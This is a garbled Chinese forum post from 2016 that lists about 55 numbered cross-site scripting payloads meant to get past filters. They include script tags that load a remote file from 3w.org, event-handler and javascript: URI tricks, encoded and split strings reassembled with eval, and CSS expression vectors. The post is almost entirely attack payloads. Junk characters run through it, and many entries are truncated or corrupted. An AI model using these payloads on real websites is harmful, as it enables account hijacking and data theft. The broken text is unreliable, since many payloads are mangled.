(1)普通的XSS JavaScript注入
# v' A) d3 }4 t7 I( h) ?<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" w+ J' Y1 l/ x(99)另类弹框
& _! L; k l# l7 V5 j$ q6 M, H<q/oncut=alert()>1' Y0 b3 v" \# W% O. }3 q
<s/onclick=alert()>b& h. o: m, z4 p9 _9 [; D1 O4 G
<XSS=" onclick="alert(1)//">clickme</SSX=">& ~9 B( U7 W$ A4 o) |7 g
<zzz onclick=alert`1`>clickme</zzz> : [6 y, _( z y5 H
<a onclick=alert`1`>clickme</a>
3 ^ h! d" \, Y/ k<a=">clickme</a=">
; E1 W0 G" o9 s) d9 y8 I3 `0 r# K3 N<a=">clickme</a>, D1 |7 n. J" x8 ]0 ~3 O
<z=">clickme</z=">
5 {8 f, ^ K$ k( }/ X7 X6 C<z onclick=alert`1`>clickme</z># L ~2 x1 X! z/ \( J
9 h, q$ y' @ r$ {; r(2)IMG标签XSS使用JavaScript命令
0 a5 V9 d; z2 c7 a ?3 _- \* q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' w5 E& P1 w6 @9 q1 v' E- [* y! D# f r3 l
(3)IMG标签无分号无引号
8 }; }7 {% j4 p* a0 c0 U+ ~/ z<IMG SRC=javascript:alert(‘XSS’)>
+ |9 T! ]4 J* M. D( x
, `/ o9 i* ^4 K# _ a- M1 K(4)IMG标签大小写不敏感
, h& r/ u5 K6 d, H& i0 w<IMG SRC=JaVaScRiPt:alert(‘XSS’)>+ _' G4 d2 B1 N- f8 K/ n
}9 V9 c. p3 v(5)HTML编码(必须有分号)0 N# N, z3 {6 D8 P
<IMG SRC=javascript:alert(“XSS”)>
( j7 ]: n- [4 K& n- J
$ Y1 S" j" y3 `/ ]2 _" J(6)修正缺陷IMG标签
( }4 i+ J" c9 y% S" { {! }<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 b- n% }0 M/ p4 u7 K* V( E2 P2 U) T- g0 Z2 M7 e) r: Y3 }" Z
(7)formCharCode标签(计算器)' z5 O( M! n) `$ w. O, y7 v
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' E( W5 h9 z* X8 C: \1 [" I, a# G
; t2 t, J1 E0 J3 Q
(8)UTF-8的Unicode编码(计算器)
+ N+ l. M; ?) b8 J0 U/ h6 f+ T<IMG SRC=jav..省略..S')>
/ I* j7 d4 K n0 E |3 A4 S
# f* q/ P6 e2 X* s* W(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
9 a n4 c. g! C) ?<IMG SRC=jav..省略..S')>
/ T6 G& e2 w/ X& ?' o$ i. c
& G5 b! a7 `# z! S* i, @6 n+ X( R, {(10)十六进制编码也是没有分号(计算器)
$ R! E+ ^) L, [+ H% i3 I<IMG SRC=\'#\'" /span>
0 o: R4 h+ P6 e; o/ [3 y1 o* o! ]8 Q, L
(11)嵌入式标签,将Javascript分开
& O& P) B0 t* Z* d6 L- l9 e<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, v6 ~6 ?, J! A0 v. I* m; t1 ^6 g
- j- |; H3 p5 N" v! R/ y(12)嵌入式编码标签,将Javascript分开/ R; D: @7 D* N% Y$ X& g4 T
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>6 H4 [) z, a$ m* l
$ Z6 w* R8 _0 I: G( M& ~
(13)嵌入式换行符 I9 b( e8 _' G! n' s
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# E# r. a; R, Z- i6 H/ U- {+ U( M9 j, b6 e3 x4 L, h; t0 D9 ?$ ]
(14)嵌入式回车
0 w9 A% z6 ^3 n5 O6 V<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>0 X% {% o% n1 Z. ?: l/ w. A u8 |
4 ?+ O) r) `' u; w8 Q; \( V0 k7 e o
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 y- @: \6 R. p2 s, q( b<IMG SRC=\'#\'" /span>4 h7 N7 d- g3 ?
- J2 [, I' ^/ _/ A$ }% @9 O
(16)解决限制字符(要求同页面)
$ U4 e# @, b- a3 K/ h<script>z=’document.’</script>6 i; z: p w9 h! V3 O) L
<script>z=z+’write(“‘</script>
% I3 F8 p0 @9 z, T& b<script>z=z+’<script’</script>& w, C4 H. H: U \3 K( Q q; a3 y& Z
<script>z=z+’ src=ht’</script>' s* T9 n7 P1 _3 q/ x0 N5 G
<script>z=z+’tp://ww’</script>
# H: e( q @9 B* P7 Z<script>z=z+’w.shell’</script>! N1 K; r/ w( j- T4 V/ u& ]' O
<script>z=z+’.net/1.’</script>
7 b# \* q2 T7 k<script>z=z+’js></sc’</script>( L. c9 ~& C* h7 D% |
<script>z=z+’ript>”)’</script>' R" g/ Q, K. }6 e; c1 s t& r0 K
<script>eval_r(z)</script>
; K/ P+ e# M% g F& ^, V6 e) E/ N/ a# {" O
(17)空字符
) N6 u, A/ C0 X/ T% W8 B7 J' xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out# Q& ?. [# X& ~
" i8 D6 p u+ {/ N; u4 q% g; W" c% U' m(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
& n: H$ n9 r# m- uperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out( M! X2 R5 ]0 E5 h# c d
9 U4 p* R) U8 X( i( r9 v(19)Spaces和meta前的IMG标签
+ X, d) p4 t) W0 C5 G: o5 w<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
5 @: Y W. ]! [% q# [: ]3 V$ m: o) M/ [- k4 |4 [
(20)Non-alpha-non-digit XSS
. m: g- w- \3 `# Y" k+ @2 }<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
5 w9 }& i& x O
, y/ W, A! p. |/ f7 S(21)Non-alpha-non-digit XSS to 2
" ?) P3 G9 k ?5 Z. \9 e<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ P9 }$ m/ r, [
5 F! U f# z3 @9 \* L(22)Non-alpha-non-digit XSS to 3
* I7 l3 T( l9 |. V" O2 y2 w<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>3 c4 j, ^1 e5 `
$ i( j$ j! |3 U, j, E7 q(23)双开括号2 X9 l, D1 L2 a
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 P) N2 h$ l2 Y6 W; b
* u0 |/ z, @8 G+ V6 V/ ^ c(24)无结束脚本标记(仅火狐等浏览器)
6 l2 G' P' Q8 D( `; l<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 X; q7 c" l4 o$ e2 J; u
& D2 \, T O; e8 [% D(25)无结束脚本标记2# \2 ^' T. K- r% k
<SCRIPT SRC=//3w.org/XSS/xss.js> n' U7 _: o7 ]6 x9 E$ s/ B, b
k* V* l0 i+ B d( s(26)半开的HTML/JavaScript XSS" x, t1 c) u% n" \ U, T, l
<IMG SRC=\'#\'" /span>5 l: |1 m1 Z4 _6 ^+ P- C8 W+ r
3 O7 S: v' N) Y/ Q. _- |(27)双开角括号
. t& u. ^1 z* T! P* e' j% D<iframe src=http://3w.org/XSS.html <- ]- B) t' b7 }0 g- B
1 D" f3 c4 J8 B(28)无单引号 双引号 分号
3 q+ \9 n2 k# Q' C4 m<SCRIPT>a=/XSS/
6 L3 `$ t2 W7 C) G @+ J! _alert(a.source)</SCRIPT>: a' o; @* z# [/ z0 k1 v! r
. H9 j- B0 P- b(29)换码过滤的JavaScript# E# e" ^8 F; j9 G4 l
\”;alert(‘XSS’);//3 I$ c3 O" r, @* W1 P& q! h6 }# p# p) c
: |$ ^' O3 u4 E+ J" C
(30)结束Title标签. P$ A! j& }% k. B4 k
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>: p* W- a( _% w q+ y% _
* R, O, ?6 C3 T2 e, U/ q2 _( t(31)Input Image% b; {% m, [7 z( s. W
<INPUT SRC=\'#\'" /span>
7 d: Z$ d9 m7 ^7 S( g3 M* @3 _+ X$ t4 T, R
(32)BODY Image
0 H0 @! C1 s4 V% `. `<BODY BACKGROUND=”javascript:alert(‘XSS’)”>! @8 @7 d2 B4 I: d% x1 o* E6 h# p$ H
& l# p' m# N9 I; U
(33)BODY标签3 v& v2 V& b3 M' X
<BODY(‘XSS’)>' M6 M: N; v2 E8 e* C
/ m6 u+ `* N: t) A, [(34)IMG Dynsrc
4 q) c" p9 P" D3 F. S( R$ k4 T<IMG DYNSRC=\'#\'" /span>
D6 R3 B2 }0 \1 H+ q. t) S5 }( m; t* s6 r% X4 k0 L7 A
(35)IMG Lowsrc% M3 E) _+ m# ]1 ~2 W: ?1 _
<IMG LOWSRC=\'#\'" /span>$ h; [5 y( m' ?% ?3 z, M
6 Y8 R+ M8 J5 T& J" x4 F' o0 Z(36)BGSOUND
3 c+ w$ ?3 Q( L- j<BGSOUND SRC=\'#\'" /span>" z" J$ ~2 m5 K" q
7 z5 [/ C3 M# `+ }
(37)STYLE sheet6 i$ R2 T/ p( c$ p) t. D: J+ k
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 G' E, [3 \& Y9 m6 {( g( _
$ J4 c" o' t$ g+ ]4 f, u q
(38)远程样式表
: ], q' W/ V1 C<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
4 p& H! E! U' N$ a
% F0 o. \6 X: F( a(39)List-style-image(列表式)
- Q c+ S" x/ C9 h6 t<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& I7 R; L# Q1 N4 D, E' \- G6 P% r T: V' s, [
(40)IMG VBscript$ `& b' j: H" C
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
+ L9 M$ J: d5 @& ^, c) X# d" Z3 ^( ^$ X$ v A0 r3 f2 H1 I6 ^
(41)META链接url% }! d8 m9 O/ h+ S! }
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>1 F, p+ ~0 b R- ^' I, S
# C4 ~* j2 a% b, G
(42)Iframe
1 N e8 U6 o+ M: r5 z<IFRAME SRC=\'#\'" /IFRAME>
9 k* Z# }& N" H8 G' A: g, D3 y9 L3 g% ?; w+ i; ]
(43)Frame7 \; y# y9 q8 `& J; Z* q
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>) {% ^5 Q% I) T" U) E! ^* _
) ~$ }) i+ l* `# v4 j) I
(44)Table
) \/ c5 i0 d' N' @<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 M) G h# q. U D1 I* V; `
9 M% @; I% l1 o(45)TD. i; ^, y7 k: i. v" q2 N
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 S* Z2 k0 U( P& ?; U. `
0 t" u/ Z8 F% `
(46)DIV background-image* E% N. T. ]$ j$ W" ~) E
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( h5 L7 Q: B% g" {9 ]2 W4 N
0 O4 |% e2 `1 P# b" ?3 g$ o& }% ~
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)0 |! a) o2 H9 R0 S2 F5 t }% J3 s
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>3 p/ ^* r# j. F5 N7 [
9 l! ?( g& ^: ^" w(48)DIV expression1 c3 E6 W4 g! }" V- Q9 g
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>$ |' O& d. _0 t* O% O& E
( R, J2 a: H. M6 F/ S
(49)STYLE属性分拆表达1 o7 U. v; \9 f8 b9 S7 @" H" `
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”> |" u4 i$ Y4 Z5 ^7 g( s% d8 K
- e) {1 U e) F
(50)匿名STYLE(组成:开角号和一个字母开头)
# Y8 C+ f& f7 `% `<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
Z- z9 e- r' d1 A7 K3 [, F" m7 l' d( g4 O+ ~% A- f) N
(51)STYLE background-image7 e9 x$ }& \4 ?$ P* Y; n2 ^) r* S
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
! E$ w* {2 q( f1 G4 V3 u2 n6 E a c4 J. I1 H8 a9 e
(52)IMG STYLE方式- _ H+ V: C A( Q. j1 E
exppression(alert(“XSS”))’>
% K5 b9 X4 Z5 L c- }3 k+ o
2 `% U4 Y, \! ^1 o(53)STYLE background
) }8 _: ^ d" R% C* W<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>1 \ ]8 x/ y. G; X) i7 J( q, |( V! ^
0 L! G* N2 ]& U K
(54)BASE7 A( e) c( ~" \& V; k4 H, W
<BASE HREF=”javascript:alert(‘XSS’);//”>6 Y+ h& S- f& S! X( {6 |
: B6 U6 ?! x6 a3 I, Q! E(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
# ]. _1 E- y! a% D# [- `<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>' a' G: o9 J" X
|
发表于 2016-4-28 10:06:15
收藏
支持
反对